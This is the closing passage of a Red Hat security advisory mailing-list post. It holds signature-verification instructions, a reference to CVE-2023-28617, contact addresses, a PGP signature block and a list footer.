These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28617  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgltzjgjWX9erEAQj/Nw//V0aoP/jRKLJkGKH0Pp4bgDB+8e01K9Q6  
Ig6dwbkmJ0/s2pvq+7xYKLDPuCUcD+4NojVtoWhCTIEfcFx2thvFoD4jgAL1jjTR  
WNhFxhnrkQ6VCpgMa4uZnxQXFgzW3UOyKADZdjyqqV1cRr/ntrXrCwMRzsZq4/pf  
xcp2voH+zgkDhTd62q+r35oPqYG+ItOACr5psSQ+isLNliX8fWXKInU1qecwV29V  
l/+piIQqVE7uEMUAYYyV+VbgmXYgVA95Q0ILQ3Sf/x/csD2pwYvEl/Mn4w5MoAil  
xfayd2G5ocIfCCaN4aJp0FhiGdTd4CYy3SKzWPJ3EShaluyNncEWapOMb0BTZXq6  
Mo/pDTy78Qt4Le5U5xcAfs9227KH606VETAsCJJQpyh/AzlZDxc/6urOWmlYCRl2  
GDwS+FTtQHhV8dXcqCH3/tdcwJZ1Et7faQVE3O+Dh6QorqX4wJDleCIYhabHd1gh  
1vQylU3vU2FZkKpjEhG3qbvK4g49fHt96MD77hbzxQc+m+5Z9xL9N4MtUGGP/sly  
XlOz5Nl1dhjM3ghoj3R5Dkm6obX28uuZXUNyf+xeud0v8urHhg7sS44+HFMjQiZA  
SLEZGLpAXC9COvaHElO6IwgEv/xuPoecFmbzkQ/ly16sDpz8Bkdr7xnfLn35khVW  
/2W4C5DXDw4=  
=BXIt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux